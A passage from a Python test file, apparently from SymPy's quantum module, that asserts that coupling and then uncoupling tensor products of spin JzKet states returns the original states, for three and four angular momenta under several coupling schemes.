JzKet(S.Half, S(-1) / 2), JzKet(1, 1), JzKet(S.Half, S.Half)
),
((1, 3), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(S.Half, Rational(-1, 2))
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S(-1) / 2),
JzKet(1, 1),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S(-1) / 2), JzKet(1, 0), JzKet(S.Half, S.Half)
),
((1, 3), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(S.Half, Rational(-1, 2))
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S(-1) / 2),
JzKet(1, 0),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S(-1) / 2), JzKet(1, -1), JzKet(S.Half, S.Half)
),
((1, 3), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1), JzKet(S.Half, Rational(-1, 2))
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.NegativeOne / 2),
JzKet(1, -1),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (1, 2)),
)
)
)
@slow
def test_uncouple_4_coupled_states():
# j1=1/2, j2=1/2, j3=1/2, j4=1/2
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S(1) / 2, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S(1) / 2, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S(1) / 2, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S(1) / 2, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S(1) / 2, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S(1) / 2, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S(1) / 2, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S(1) / 2, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S(1) / 2, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S(1) / 2, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S(1) / 2, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S(1) / 2, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
# j1=1/2, j2=1/2, j3=1, j4=1/2
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
# Couple j1+j3=j13, j2+j4=j24, j13+j24=j
# j1=1/2, j2=1/2, j3=1/2, j4=1/2
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
# j1=1/2, j2=1/2, j3=1, j4=1/2
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(S.Half, S.Half),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(S.Half, S.Half),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(S.Half, S.Half),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(S.Half, S.Half),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(S.Half, S.Half),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(S.Half, S.Half),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(S.Half, S.Half),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(S.Half, S.Half),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
